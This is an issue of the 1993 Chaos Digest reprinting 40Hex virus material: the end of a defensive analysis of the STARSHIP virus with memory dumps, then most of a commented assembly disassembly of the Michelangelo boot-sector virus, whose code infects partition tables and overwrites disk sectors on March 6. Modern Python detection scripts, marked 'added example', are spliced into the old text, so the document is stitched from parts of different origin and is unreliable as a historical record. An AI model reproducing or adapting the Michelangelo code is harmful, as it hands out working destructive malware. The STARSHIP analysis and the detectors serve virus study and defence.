Chaos Digest               Friday 2 July 1993              Volume 1 : Number 68
                                                                ISSN 1244-4901

       Editor: Jean-Bernard Condat (jbcondat@attmail.com)
       Archivist: Yves-Marie Crabbe
       Co-editors: Arnaud Bigare, Stephane Briere

TABLE OF CONTENTS, #1.68 (2 July 1993)

File 1--40H VMag Number 8 Volume 2 Issue 4 #005(2)-006 (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:

                linux-activists-request@niksula.hut.fi

with a mail header or first line containing the following information:

                X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF],
B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF
(#1299) groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS
(+352) 466893.

Back issues of ChaosD can be found on the Internet as part of the Computer
underground Digest archives. They're accessible using anonymous FTP:

        * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
        * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
        * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
        * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
        * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
        * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
        * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
        * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses.
Please avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Chaos Digest contributors assume all responsibility
for ensuring that articles submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 8 Volume 2 Issue 4 #005(2)-006 (reprint)

5. ERRORS AND BUGS

When STARSHIP infects a hard disk it overwrites the last 6 sectors of the
disk. The contents of these sectors are unrecoverably lost! Moreover, the
virus controls all disk accesses (via int 13h) to prevent its code from
being overwritten: all writes to the virus area are simply ignored, and no
error condition is returned. But if you boot DOS from a floppy disk and then
modify this restricted zone (for example, by writing a file that happens to
occupy the last cluster of the hard disk), the computer will not reboot
later and will hang. You will need to recreate the MBR to overcome this
problem.

I have determined that the problem may appear when the first program used is
MARK (by TurboPower Software). This program is used in combination with
RELEASE to remove all resident utilities loaded after MARK, saving and
restoring the interrupt vector table and the state of EMS memory. While MARK
remains resident, the virus attaches itself to MARK's memory block and
everything works correctly. But when you run RELEASE, the computer hangs.
This happens because RELEASE restores the interrupt table to its state from
before (!) the virus moved to conventional RAM, i.e. when the virus was
still in video memory. Consequently, after RELEASE, vectors 13h and 21h
point into video memory, where there are no handlers at that moment, and
the computer hangs immediately.
Probably, if you replace your CGA, EGA or VGA adaptor with an MDA, your
computer will hang after power-up, because there will be no space to store
the virus during reboot. (The virus checks for the existence of video memory
only once, before infecting the disk.) The use of a special restoration
procedure at address 0:2C0 in the interrupt vector table must cause
malfunctions on computers that use vectors B0...BB during reboot. (The virus
uses these vectors only during reboot, while the restoration procedure is
located at address 0:2C0. When the virus goes resident in conventional
memory, all these vectors are cleared to zero!)

I have found that some XT computers with the RAMDRIVE driver in CONFIG.SYS
did not execute some programs (Harvard Graphics, MS-FORTRAN, QuickBASIC).
Some users have reported problems rebooting an infected PS/2 model 30.
These examples establish the rule: remove the virus as soon as you have
confirmed its presence. There are no harmless viruses. Remember: any
infected program may cause your computer to malfunction!

6. STARSHIP DETECTION

The STARSHIP virus has one special feature: it does not modify any
executable file on the hard disk. So if you use passive virus detectors
(based on generating CRC checksums of files) to test your hard disk, you
will never get a warning of virus activity; each file on the hard disk
remains unchanged. Additionally, if such a utility examines the contents of
the MBR and the DOS boot sector, it will not report the infection if it uses
plain interrupt 13h: on every access to the MBR via int 13h, STARSHIP
substitutes the original MBR for the infected one.

How can the presence of STARSHIP be detected? It is a real problem, because
searching infected files for a virus descriptor (a fixed byte signature) is
impossible. No standard software can be used to find STARSHIP. Only
specially designed scanning programs that analyse the contents of the EXE
header or the code at the file entry point are useful.
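Section 6 explains why CRC-based integrity checkers and int 13h reads of the MBR miss STARSHIP, and the hints that follow name two symptoms that can be checked on raw data: FDISK showing equal Start and End for the DOS partition, and roughly 2.7 kbytes of "garbage" (the XOR-encrypted virus body) at the tail of an executable. The script below is an added example, not code from the article or from the AIDSTEST/FDISK tools it mentions. It assumes a 2700-byte tail window and a 7.0 bits/byte entropy threshold (my choices, derived only from the "approximately 2.7 kbytes" remark), interprets the FDISK symptom as a non-empty partition entry whose start and end CHS fields coincide, and works on a sector image and file images that are constructed inline.

```python
"""Offline checks for two STARSHIP symptoms: an encrypted-looking file tail
and an MBR partition entry whose Start and End coincide.  Added example;
the sample sector and file images below are constructed, not captured."""
import math
import random
import struct

TAIL_LEN = 2700            # "approximately 2.7 kbytes of garbage" (article)
ENTROPY_THRESHOLD = 7.0    # bits per byte; assumption, not from the article


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def tail_looks_encrypted(image: bytes, tail_len: int = TAIL_LEN) -> bool:
    """Flag a file whose last tail_len bytes look like random data instead
    of the text, tables or zeros a clean program usually ends with."""
    if len(image) < tail_len:
        return False
    return shannon_entropy(image[-tail_len:]) >= ENTROPY_THRESHOLD


def _decode_chs(head: int, sector_byte: int, cyl_byte: int):
    """Unpack the packed 3-byte CHS field of an MBR partition entry."""
    cylinder = ((sector_byte & 0xC0) << 2) | cyl_byte
    sector = sector_byte & 0x3F
    return (cylinder, head, sector)


def parse_partition_table(sector: bytes):
    """Return the four MBR entries as dicts; raise on a malformed sector."""
    if len(sector) != 512 or sector[510:512] != b"\x55\xAA":
        raise ValueError("not a 512-byte sector with a 55AA signature")
    entries = []
    for i in range(4):
        raw = sector[446 + 16 * i: 446 + 16 * (i + 1)]
        boot, sh, ss, sc, ptype, eh, es, ec, lba, count = struct.unpack("<BBBBBBBBII", raw)
        entries.append({"boot": boot, "type": ptype,
                        "start": _decode_chs(sh, ss, sc),
                        "end": _decode_chs(eh, es, ec),
                        "lba": lba, "sectors": count})
    return entries


def suspicious_partitions(sector: bytes):
    """Indices of non-empty entries whose Start and End CHS coincide, the
    FDISK symptom the article describes for an infected hard disk."""
    return [i for i, e in enumerate(parse_partition_table(sector))
            if e["type"] != 0 and e["start"] == e["end"]]


def _mbr(entry: bytes) -> bytes:
    """Constructed sample MBR: dummy code area, one entry, 55AA signature."""
    return b"\xEB\xFE" + b"\x00" * 444 + entry + b"\x00" * (64 - len(entry)) + b"\x55\xAA"


# Constructed: a DOS partition from C/H/S 0/1/1 to 1023/3/17, and one whose
# end equals its start (type 06h, 69768 sectors starting at LBA 17).
NORMAL_MBR = _mbr(struct.pack("<BBBBBBBBII", 0x80, 1, 1, 0, 0x06, 3, 0xD1, 0xFF, 17, 69768))
STEALTHY_MBR = _mbr(struct.pack("<BBBBBBBBII", 0x80, 1, 1, 0, 0x06, 1, 1, 0, 17, 69768))

# Constructed file images: a clean .COM ending in a usage text plus zero
# padding, and one whose tail is 2.7 KB of seeded pseudo-random bytes.
_rng = random.Random(1)
CLEAN_COM = b"\xB4\x09\xCD\x21\xC3" + b"Usage: PROG [options]\r\n" * 40 + b"\x00" * 2000
GARBAGE_TAIL_COM = b"\xB4\x09\xCD\x21\xC3" + bytes(_rng.getrandbits(8) for _ in range(TAIL_LEN))


if __name__ == "__main__":
    for name, img in (("clean", CLEAN_COM), ("garbage tail", GARBAGE_TAIL_COM)):
        print(f"{name:12s} tail entropy {shannon_entropy(img[-TAIL_LEN:]):.2f} "
              f"-> {'suspicious' if tail_looks_encrypted(img) else 'ok'}")
    print("normal MBR  :", suspicious_partitions(NORMAL_MBR))
    print("stealthy MBR:", suspicious_partitions(STEALTHY_MBR))
```

Two caveats follow directly from the article. The sector handed to `suspicious_partitions` must be read after booting from a clean DOS diskette, because the resident virus substitutes the original MBR on every int 13h read, so a live read would show nothing. And a high-entropy tail is only a hint: a program compressed with a runtime packer ends in random-looking data too, and the article itself notes that an already-infected file hidden inside an archive is invisible to this kind of inspection.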
Here follow some useful hints for determining the presence of the STARSHIP
virus.

If you have the antivirus program AIDSTEST by Lozinsky (version later than
115, April 1991), it can scan and disinfect files (AIDSTEST calls the virus
"STARSHIP-2616"). Sometimes it refuses to disinfect a file and reports
something like "Cannot remove virus. Delete file(Y/N)?".

If you boot from an original DOS diskette and run FDISK, Display Partition
Information shows that the Start and End of the DOS partition are equal on
an infected hard disk.

You can also detect the presence of STARSHIP in memory by examining
(unassembling) the RAM contents at address 0:4B0 with DEBUG (compare with
Fig.3).

Executable files typically end with text messages, tables or zeros. So you
can visually examine the tail of an executable file, and if you see
approximately 2.7 kbytes of garbage, that is suspicious and you may suspect
the presence of the virus. Experienced programmers may also inspect the
program entry point with DEBUG and analyse the disassembled listing.

I also recommend not copying executable files to floppies directly. Use an
archiving utility and then copy the archives to the floppies. This saves
disk space and also protects against file infection. But this method has one
disadvantage: if the original file is already infected, you will not be able
to detect the virus, because it is stored inside the archive in compressed
form.

Identifying the STARSHIP virus is complex because it makes extensive use of
XOR coding with random masks. In an infected file 100% of the virus is
encrypted; on disk, 5/6 of it; and in memory, approximately 60%. This is a
very interesting feature: the virus is never available in pure form, being
variable on disk, in files and in memory.

CONCLUSION

In my opinion the investigated virus is a very interesting program. The
virus code is highly optimised at the machine-code level, possibly in order
to fit the code exactly into 5 sectors on disk.
The virus uses various software techniques: it has anti-tracing and
anti-disassembling features, and it has no descriptor. These measures were
effective to some extent, because I had some problems in source
reconstruction; in many cases the reconstructed source seems not to be fully
adequate. The present stage of virus technology is characterised by the
complexity of virus search, identification and reconstruction. This tendency
to create complex and stealthy viruses seems to be general. Recall, for
example, the XOR-coded 1701 virus group; the Yankee Doodle group of viruses
[5,6] (also called the TP group [3]), which disinfects any infected file
that is being debugged [3,5]; the smart Century virus [7]; and the SVC
series, which filters all accesses to directories and presents the original
file size for each infected file. The name of the virus (STARSHIP_1) reveals
the author's intention to extend the series. Be attentive, and remember:
backups may save you a vast amount of time.

ACKNOWLEDGEMENTS

I am greatly indebted to V.V.Snegirev and A.G.Yakovlev for useful
discussions. I would also like to thank my wife Helen for her understanding
and support. I am indebted to Vesselin Bontchev, who read the draft of the
paper and made many valuable comments. I also wish to acknowledge the
sponsorship of NPO "POLITON" (Moscow, USSR).

REFERENCES

[1] Dewdney A.K., In the game called Core War hostile programs engage in a
    battle of bits, Scientific American, v.250, 5 (1984) 15-19.
[2] Cohen F., Computer viruses: theory and experiments, Proc. 2nd IFIP Int.
    Conf. on Computer Security, (1984) 143-158.
[3] Bezrukov N.N., Computer virusology. Part 1: Main work principles,
    classification and catalog of viruses in DOS operating system,
    Edition 3.6, date 18.07.1990. (In soft form: files of 745 kbytes total
    size, 250p. in Russian).
[4] McBroom V., Computer viruses: what they are, how to protect against
    them, Software Protection, v.VIII, 3 (1989) 1-16.
[5] Documentation to VIRUSCAN software package from McAfee Associates.
    Version 4.3V66. File SCANV66.DOC, size 38024.
[6] McAfee J., The virus cure, Datamation, v.35, 4 (1989) 29-40.
[7] Documentation to Turbo Anti-Virus software package from CARMEL Software
    Engineering. Version 6.80A. File README.DOC, size 65566.

==================================================================
Table 1. Layout and size of virus procedures.
(the box indicates the encrypted memory section)

  Size   Offset (hex)   Description
   3%    000 - 04F      Variables and buffers (see Fig.1)
   5%    050 - 0C1      Interrupt 13h handler
  10%    0C2 - 1C7      Interrupt 21h handler
  11%    1C8 - 312      Active part & check for DOS ready
   2%    313 - 340      Random number generator (RND)
   7%    341 - 3F7      Interrupts 20h, 21h, 27h handlers
 +--- encrypted --------------------------------------------+
 |25%    3F8 - 692      Infector of EXE/COM file includes:  |
 | 9%    3F8 - 4DD        input logic                       |
 |10%    4DE - 5E9        create infected code              |
 | 6%    5EA - 692        output logic                      |
 | 3%    693 - 6E5      Tables                              |
 | 3%    6E6 - 738      Startup code for EXE/COM            |
 |12%    739 - 88F      Infect disk                         |
 | 2%    891 - 8BF      Interrupt 01h handler (trace)       |
 |11%    8C0 - 9D7      PseudoDOS boot and int B0h handler  |
 +----------------------------------------------------------+
   4%    9D8 - A4E      Remover of code from videomemory
   2%    A4F - A8F      Buffers (CS, IP, SS, SP, etc.)

=======================================================
Table 2. Minimal and maximal sizes of infected executable files.

 +-------------+------------------------+
 | File type   | Minimal      Maximal   |
 |             | size         size      |
 +-------------+------------------------+
 |             |                        |
 | .COM        | 1917         62202     |
 |             |                        |
 | .EXE        | 1917         512 K     |
 +-------------+------------------------+

==============================================================================
Figure 1. Memory block header (M-block) and memory dump of STARSHIP virus
located in core RAM. (Virus uses segment 18FB, and its memory block is at
18F2:0.)

------------------- M-memory block containing virus --------------------------
18F2:0000  4D 08 00 B0 00 0A 00 A3-8E 0B A1 0C 00 A3 90 0B   M...............
------- PSP of the file whose termination caused the virus installation ------
18F3:0000  CD 20 A3 19 00 9A F0 FE-1D F0 2F 01 0B 18 3C 01   . ......../...<.
18F3:0010  0B 18 56 05 0B 18 0B 18-01 01 01 00 02 FF FF FF   ..V.............
18F3:0020  FF FF FF FF FF FF FF FF-FF FF FF FF EE 18 E0 FF   ................
18F3:0030  00 90 14 00 18 00 F3 18-FF FF FF FF 00 00 00 00   ................
18F3:0040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
18F3:0050  CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20   .!...........
18F3:0060  20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20   .....
18F3:0070  20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00   ........
------------------ Here follows the code of virus (CS=18FB) -----------------
18FB:0000  E9 01 10 4E 0A 00 10 00-00 00 00 00 00 42 3A 5C   ...N.........B:\
18FB:0010  54 4D 50 5C 44 52 4F 5A-46 49 4C 41 2E 43 4F 4D   TMP\DROZFILA.COM
18FB:0020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
18FB:0030  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
18FB:0040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 FF   ................
18FB:0050  E9 93 06 3E 53 54 41 52-53 48 49 50 5F 31 3C 80   ...>STARSHIP_1<.
18FB:0060  FA 80 75 41 83 F9 01 75-3F 0A F6 75 38 80 FC 02   ..uA...u?..u8...
18FB:0070  75 29 1E 50 E8 13 03 58-9C FF 1E B8 04 1F 72 18   u).P...X......r.
18FB:0080  50 56 72 16 B8 01 00 BE-BE 01 26 89 40 02 B0 01   PVr.......&.@...
18FB:0090  26 88 40 01 5E 58 F8 FB-EB 7C 3C 80 FC 03 74 F6   &.@.^X...|<...t.
18FB:00A0  80 FC 05 74 F1 E9 3E 01-80 FE 08 75 F8 51 02 C8   ...t..>....u.Q..
18FB:00B0  80 F9 CC 59 72 EF 80 FD-FE 72 EA 80 FC 02 74 D6   ...Yr....r....t.
18FB:00C0  75 D9 FF F1 E8 9C 2E 80-3E 4F 00 00 75 18 50 1E   u.......>O..u.P.
18FB:00D0  8C C8 2D 09 00 E8 A9 02-A1 3C 00 48 E8 A2 02 2E   ..-......<.H....
18FB:00E0  F6 16 4F 00 1F 58 80 FC-3C 75 31 2E 83 3E 0B 00   ..O..X....
18FB:00F0  00 75 6E E8 6E 00 75 69-9D E8 CC 00 72 18 50 51   .un.n.ui....r.PQ

==================================================================
Figure 2. Dump of pseudoDOS boot sector (thin line denotes random garbage).

0000  EB 34 90 4D 53 BF 05 00-CD 13 73 09 32 E4 CD 13   .4.MS.....s.2...
0010  4F 75 F5 CD 18 C3 B9 01-00 E8 E9 FF 80 3E 00 7E   Ou...........>.~
0020  EB 75 10 A0 02 7E BB 00-7E E8 97 00 0A E4 74 03   .u...~..~.....t.
0030  80 EF 02 06 53 CB FA 33-C0 8E D0 BC 00 7C 8B F4   ....S..3.....|..
0040  8E C0 8E D8 FB FC BF 00-06 B9 00 01 F3 A5 EA 53   ...............S
0050  06 00 00 B9 37 00 BE D6-06 BF C0 02 F3 A4 BF B0   ....7...........
0060  04 B9 08 00 F3 A4 1E C5-06 4C 00 AB 8C D8 AB 1F   .........L......
0070  FE 06 FC 7D A1 FC 7D B9-CC FE BB 00 7C BA 80 08   ...}..}.....|...
0080  0A C0 74 08 50 B8 01 03-E8 7A FF 58 41 89 0E DB   ..t.P....z.XA...
0090  02 88 36 DF 02 06 BB 00-BB 8E C3 88 26 E7 02 CD   ..6.........&...
00A0  B0 26 A2 63 01 26 8C 1E-C2 00 07 FA C7 06 4C 00   .&.c.&........L.
00B0  B0 04 8C 1E 4E 00 FB BB-00 7C B8 06 02 BA 80 00   ....N....|......
00C0  E9 53 FF 53 51 B9 0A 0A-32 E4 26 30 07 26 02 27   .S.SQ...2.&0.&.'
00D0  43 E2 F7 59 5B C3 C4 02-00 00 50 06 53 B8 00 BB   C..Y[.....P.S...
00E0  8E C0 BB 50 00 26 80 3F-E9 74 1E 52 51 B8 05 02   ...P.&.?.t.RQ...
00F0  B9 00 00 BA 80 00 9C 2E-FF 1E B8 04 B0 00 B9 0A   ................
0100  0A 26 30 07 43 E2 FA 59-5A 5B 07 58 CF CD B0 9A   .&0.C..YZ[.X....
                    +--------------------------------+
0110  5F 00 00 BB EA|1E 0E 1F-8E C0 33 FF 50 FC 32 C0|  _.........3.P.2.
     +--------------+                                |
0120 |B9 50 00 F3 AA E8 F6 F7-8B F7 B9 0A 0A F3 A4 E8|  .P..............
0130 |98 F9 58 FA A3 B5 04 A3-C1 04 B8 90 90 A3 B0 04|  ..X.............
0140 |A3 BC 04 C7 06 BF 04 C5-00 B8 EB 05 A3 C8 04 B8|  ................
0150 |EB F4 A3 D4 04 BF CA 04-BE DB 04 06 1E 07 A5 A5|  ................
0160 |A4 FB A3 D9 04 A3 C8 02-C7 06 E0 02 CD 13 C7 06|  ................
0170 |E2 02 EB 0D FE 06 D9 02-CD B0 B9 37 00 BF C0 02|  ...........7....
0180 |1E 07 8C D8 F3 AA 07 1F-C3 B4 62 E8 7A F7 C3 90|  ..........b.z...
0190 |90 90 90 90 90 90 90 90-90 90 A4 4B 4C EA A6 8C|  ...........KL...
01A0 |BE 23 54 F4 BC E8 B8 6B-5B F1 B2 EC B2 81 5E F6|  .#T....k[.....^.
01B0 |88 D0 8C BC 64 CC 8E CC-86 69 6A C2 84 C8 80 6F|  ....d....ij....o
01C0 |FA 2B C0 8E D0 8E C0 8E-D8 B8 00 7C 8B E0 FB 8B|  .+.........|....
01D0 |F0 BF 00 7E FC B9 00 01-F3 A5 E9 00 02 B9 10 00|  ...~............
01E0 |8B 36 85 7E F6 04 80 75-08 83 EE 10 E2 F6 EB 37|  .6.~...u.......7
     |                             +-----------------+
01F0 |90 BF BE 07 57 B9 08 00-F3 A5|74 91 05 AD 55 AA   ....W.....t...U.
     +-----------------------------+

==================================================================
Figure 3. Dispatcher code located at absolute address 0:4B0.

a) virus code located in videomemory

0000:04B0  CD B0           INT   B0            <== int 13h
0000:04B2  9A 5F 00 00 BB  CALL  BB00:005F
0000:04B7  EA 3D A3 00 F0  JMP   F000:A33D
0000:04BC  CD B0           INT   B0            <== int 21h
0000:04BE  9A D6 03 00 BB  CALL  BB00:03D6
0000:04C3  EA 60 14 73 02  JMP   0273:1460
0000:04C8  CD B0           INT   B0            <== int 20h
0000:04CA  9A DD 03 00 BB  CALL  BB00:03DD
0000:04CF  EA 3F 14 73 02  JMP   0273:143F
0000:04D4  CD B0           INT   B0            <== int 27h
0000:04D6  9A 93 03 00 BB  CALL  BB00:0393
0000:04DB  EA 66 63 73 02  JMP   0273:6366

b) after removing of code from videomemory
   (segment CS=18FB is where virus resides)

0000:04B0  90              NOP                 <== int 13h
0000:04B1  90              NOP
0000:04B2  9A 5F 00 6D 19  CALL  18FB:005F
0000:04B7  EA 3D A3 00 F0  JMP   F000:A33D
0000:04BC  90              NOP                 <== int 21h
0000:04BD  90              NOP
0000:04BE  9A C5 00 6D 19  CALL  18FB:00C5
0000:04C3  EA 3D A3 00 F0  JMP   0273:1460
0000:04C8  EB 05           JMP   4CF           <== int 20h
0000:04CA  EA 3F 14 73 02  JMP   0273:143F
0000:04CF  EA 66 63 73 02  JMP   0273:6366
0000:04D4  EB F4           JMP   4CA           <== int 27h

===============================================================
All corrections and remarks will be greatly appreciated. Send information
directly via E-mail address (MIG@politon.msk.su) or in comp.virus group of
USENET (I am monitoring it permanently).
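The hint in section 6 (unassemble the RAM contents at 0:4B0 with DEBUG and compare with Fig.3) can be mechanised for the handful of instruction forms that dispatcher uses. The script below is an added example, not the article's code: it decodes only the five opcodes that occur in Fig.3 (NOP, INT n, far CALL, far JMP, short JMP) and flags the two symptoms the article names, a software interrupt into the vector range B0h..BBh and a far transfer into a video-memory segment (A000h..BFFFh, my assumption for "videomemory"). The first input is the byte sequence of Fig.3a; the other two are constructed, one all-zero and one modelled on the article's description of Fig.3b, where the CALLs already point at conventional memory.

```python
"""Decoder for the dispatcher at 0:4B0 shown in Fig.3, with a check for
the two symptoms the article names.  Added example, not the article's code."""
import struct

VIDEO_SEG_RANGE = range(0xA000, 0xC000)   # assumption: CGA/EGA/VGA RAM segments
VIRUS_VECTORS = range(0xB0, 0xBC)         # vectors B0h..BBh used by STARSHIP


def decode_dispatcher(dump: bytes, base: int = 0x4B0):
    """Return (address, text, info) triples.  info is None, ('int', n),
    ('far', seg, off) or ('short', target); unknown bytes become DB."""
    out, i = [], 0
    while i < len(dump):
        addr, op = base + i, dump[i]
        if op == 0x90:
            out.append((addr, "NOP", None))
            i += 1
        elif op == 0xCD and i + 1 < len(dump):
            n = dump[i + 1]
            out.append((addr, f"INT {n:02X}", ("int", n)))
            i += 2
        elif op in (0x9A, 0xEA) and i + 4 < len(dump):
            off, seg = struct.unpack_from("<HH", dump, i + 1)
            mnem = "CALL" if op == 0x9A else "JMP"
            out.append((addr, f"{mnem} {seg:04X}:{off:04X}", ("far", seg, off)))
            i += 5
        elif op == 0xEB and i + 1 < len(dump):
            rel = struct.unpack_from("<b", dump, i + 1)[0]
            target = addr + 2 + rel            # relative to the next instruction
            out.append((addr, f"JMP {target:X}", ("short", target)))
            i += 2
        else:
            out.append((addr, f"DB {op:02X}", None))
            i += 1
    return out


def findings(instrs):
    """Instructions matching either symptom, with a one-line reason."""
    hits = []
    for addr, text, info in instrs:
        if info and info[0] == "int" and info[1] in VIRUS_VECTORS:
            hits.append((addr, text, "software interrupt into vector range B0h-BBh"))
        elif info and info[0] == "far" and info[1] in VIDEO_SEG_RANGE:
            hits.append((addr, text, "far transfer into video memory"))
    return hits


# Bytes of Fig.3a, 0:4B0..0:4DF, while the virus still sits in video memory.
FIG3A = bytes.fromhex(
    "CDB0" "9A5F0000BB" "EA3DA300F0"
    "CDB0" "9AD60300BB" "EA60147302"
    "CDB0" "9ADD0300BB" "EA3F147302"
    "CDB0" "9A930300BB" "EA66637302"
)
# Constructed: the same area holding only zeros.
CLEAN = bytes(48)
# Constructed after the description of Fig.3b: NOPs and a CALL into 18FB.
MOVED = bytes.fromhex("9090" "9A5F00FB18" "EA3DA300F0")


if __name__ == "__main__":
    for addr, text, _ in decode_dispatcher(FIG3A):
        print(f"0000:{addr:04X}  {text}")
    for addr, text, why in findings(decode_dispatcher(FIG3A)):
        print(f"  suspicious at 0000:{addr:04X}: {text} ({why})")
    print("moved-to-RAM sample:", findings(decode_dispatcher(MOVED)))
```

The `MOVED` sample shows the limit of the check, which the article's Fig.3b makes explicit: once the virus has moved into conventional memory the INT B0h stubs are replaced by NOPs and the CALLs target an ordinary segment, so neither rule fires. Comparing the decoded listing against a known-clean machine, as the article suggests, still works in that phase.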
F .rs mbyt- tF .rs mbyt- tF . (What is this? -Ed.)

+++++

40Hex Number 8 Volume 2 Issue 4                                      File 006

;This is a disassembly of the much-hyped michelangelo virus.
;As you can see, it is a derivative of the Stoned virus.  The
;junk bytes at the end of the file are probably throwbacks to
;the Stoned virus.  In any case, it is yet another boot sector
;and partition table infector.

michelangelo    segment byte public
                assume  cs:michelangelo, ds:michelangelo
;Disassembly by Dark Angel of PHALCON/SKISM
                org     0

                jmp     entervirus

highmemjmp      db      0F5h, 00h, 80h, 9Fh
maxhead         db      2                       ;used by damagestuff
firstsector     dw      3
oldint13h       dd      0C8000256h

int13h:
                push    ds
                push    ax
                or      dl, dl                  ;default drive?
                jnz     exitint13h              ;exit if not
                xor     ax, ax
                mov     ds, ax
                test    byte ptr ds:[43fh], 1   ;disk 0 on?
                jnz     exitint13h              ;if not spinning, exit
                pop     ax
                pop     ds
                pushf
                call    dword ptr cs:[oldint13h];first call old int 13h
                pushf
                call    infectdisk              ;then infect
                popf
                retf    2
exitint13h:
                pop     ax
                pop     ds
                jmp     dword ptr cs:[oldint13h]

infectdisk:
                push    ax
                push    bx
                push    cx
                push    dx
                push    ds
                push    es
                push    si
                push    di
                push    cs
                pop     ds
                push    cs
                pop     es
                mov     si, 4
readbootblock:
                mov     ax,201h                 ;Read boot block to
                mov     bx,200h                 ;after virus
                mov     cx,1
                xor     dx,dx
                pushf
                call    oldint13h
                jnc     checkinfect             ;continue if no error
                xor     ax,ax
                pushf
                call    oldint13h               ;Reset disk
                dec     si                      ;loop back
                jnz     readbootblock
                jmp     short quitinfect        ;exit if too many failures
checkinfect:
                xor     si,si
                cld
                lodsw
                cmp     ax,[bx]                 ;check if already infected
                jne     infectitnow
                lodsw
                cmp     ax,[bx+2]               ;check again
                je      quitinfect
infectitnow:
                mov     ax,301h                 ;Write old boot block
                mov     dh,1                    ;to head 1
                mov     cl,3                    ;sector 3
                cmp     byte ptr [bx+15h],0FDh  ;360k disk?
                je      is360Kdisk
                mov     cl,0Eh
is360Kdisk:
                mov     firstsector,cx
                pushf
                call    oldint13h
                jc      quitinfect              ;exit on error
                mov     si,200h+offset partitioninfo
                mov     di,offset partitioninfo
                mov     cx,21h                  ;Copy partition table
                cld
                rep     movsw
                mov     ax,301h                 ;Write virus to sector 1
                xor     bx,bx
                mov     cx,1
                xor     dx,dx
                pushf
                call    oldint13h
quitinfect:
                pop     di
                pop     si
                pop     es
                pop     ds
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                retn

entervirus:
                xor     ax,ax
                mov     ds,ax
                mov     ss,ax
                mov     ax,7C00h                ;Set stack to just below
                mov     sp,ax                   ;virus load point
                sti
                push    ds                      ;save 0:7C00h on stack for
                push    ax                      ;later retf
                mov     ax,ds:[13h*4]
                mov     word ptr ds:[7C00h+offset oldint13h],ax
                mov     ax,ds:[13h*4+2]
                mov     word ptr ds:[7C00h+offset oldint13h+2],ax
                mov     ax,ds:[413h]            ;memory size in K
                dec     ax                      ;1024 K
                dec     ax
                mov     ds:[413h],ax            ;move new value in
                mov     cl,6
                shl     ax,cl                   ;ax = paragraphs of memory
                mov     es,ax                   ;next line sets seg of jmp
                mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
                mov     ax,offset int13h
                mov     ds:[13h*4],ax
                mov     ds:[13h*4+2],es
                mov     cx,offset partitioninfo
                mov     si,7C00h
                xor     di,di
                cld
                rep     movsb                   ;copy to high memory
                                                ;and transfer control there
                jmp     dword ptr cs:[7C00h+offset highmemjmp]

;destination of highmem jmp
                xor     ax,ax
                mov     es,ax
                int     13h                     ;reset disk
                push    cs
                pop     ds
                mov     ax,201h
                mov     bx,7C00h
                mov     cx,firstsector
                cmp     cx,7                    ;hard disk infection?
                jne     floppyboot              ;if not, do floppies
                mov     dx,80h                  ;Read old partition table of
                int     13h                     ;first hard disk to 0:7C00h
                jmp     short exitvirus
floppyboot:
                mov     cx,firstsector          ;read old boot block
                mov     dx,100h                 ;to 0:7C00h
                int     13h
                jc      exitvirus
                push    cs
                pop     es
                mov     ax,201h                 ;read boot block
                mov     bx,200h                 ;of first hard disk
                mov     cx,1
                mov     dx,80h
                int     13h
                jc      exitvirus
                xor     si,si
                cld
                lodsw
                cmp     ax,[bx]                 ;is it infected?
                jne     infectharddisk          ;if not, infect HD
                lodsw                           ;check infection
                cmp     ax,[bx+2]
                jne     infectharddisk
exitvirus:
                xor     cx,cx                   ;Real time clock get date
                mov     ah,4                    ;dx = mon/day
                int     1Ah
                cmp     dx,306h                 ;March 6th
                je      damagestuff
                retf                            ;return control to original
                                                ;boot block @ 0:7C00h
damagestuff:
                xor     dx,dx
                mov     cx,1
smashanothersector:
                mov     ax,309h
                mov     si,firstsector
                cmp     si,3
                je      smashit
                mov     al,0Eh
                cmp     si,0Eh
                je      smashit
                mov     dl,80h                  ;first hard disk
                mov     maxhead,4
                mov     al,11h
smashit:
                mov     bx,5000h                ;random memory area
                mov     es,bx                   ;at 5000h:5000h
                int     13h                     ;Write al sectors to drive dl
                jnc     skiponerror             ;skip on error
                xor     ah,ah                   ;Reset disk drive dl
                int     13h
skiponerror:
                inc     dh                      ;next head
                cmp     dh,maxhead              ;2 if floppy, 4 if HD
                jb      smashanothersector
                xor     dh,dh                   ;go to next head/cylinder
                inc     ch
                jmp     short smashanothersector
infectharddisk:
                mov     cx,7                    ;Write partition table to
                mov     firstsector,cx          ;sector 7
                mov     ax,301h
                mov     dx,80h
                int     13h
